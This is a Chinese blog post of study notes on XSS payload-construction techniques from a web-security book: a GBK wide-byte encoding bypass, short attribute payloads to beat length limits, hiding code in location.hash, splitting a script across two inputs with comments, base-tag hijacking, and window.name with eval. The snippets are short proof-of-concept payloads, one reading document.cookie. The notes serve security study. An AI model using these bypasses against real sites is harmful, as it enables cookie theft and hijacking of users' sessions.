白帽子讲web安全笔记——XSS(二)

XSS构造技巧

利用字符编码

由于采用GBK/GB2312编码   %c1\长两个字符组合在一起会成为一个新的Unicode,会变成一个字符从而绕过系统的安全检查。

绕过长度限制

假设下面的代码存在一个漏洞

<input type=text value="$var" />

那下面的XSS构造就会失效

"><script>alert(/xss/)</script>

重新构造利用攻击时间来缩短所需要的字节数

"onclick=alert(1)// 

但是利用时间缩短的字节数是有限的,最好的办法是把XSS Payload写到别处,通过简短的代码加载这段XSS Payload。

常用的藏代码的地方是“location.hash”,并且web日志中并不会记录下location.hash里的内容,从而更好地隐藏了黑客真实的意图。

利用注释符绕过长度限制。比如我们能控制两个文本框,通过注释符号把两个文本框之间的HTML代码全部注释掉。

在第一个input框中,输入

"><!-- 

在第二个input框中,输入

--><script>alert(/xss/);</script>

使用<base>标签 

<body>
<base href="http://www.goole.com"/>
<img src="/intl/en_ALL/images/srpr/logolw.png"/>
</body>

<base>标签将指定其后的标签默认从"http://www.google.com"取url。<base>标签可以出现在页面的任何地方,并作用于位于该标签之后的所有标签。攻击者可以通过在远程服务器上伪造图片、链接或脚本,劫持当前页面中的所有使用“相对路径”的标签。

window.name的妙用

使用window.name可以缩短XSS的payload长度

<script>
window.name = "alert(document.cookie)";
location.href = "http://www.xssedsite.com/xssed.php";
</script>

在同一窗口打开XSS的站点后,只需要通过XSS执行以下代码即可

eval(name);

 

Anehta回旋镖

Flash XSS

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值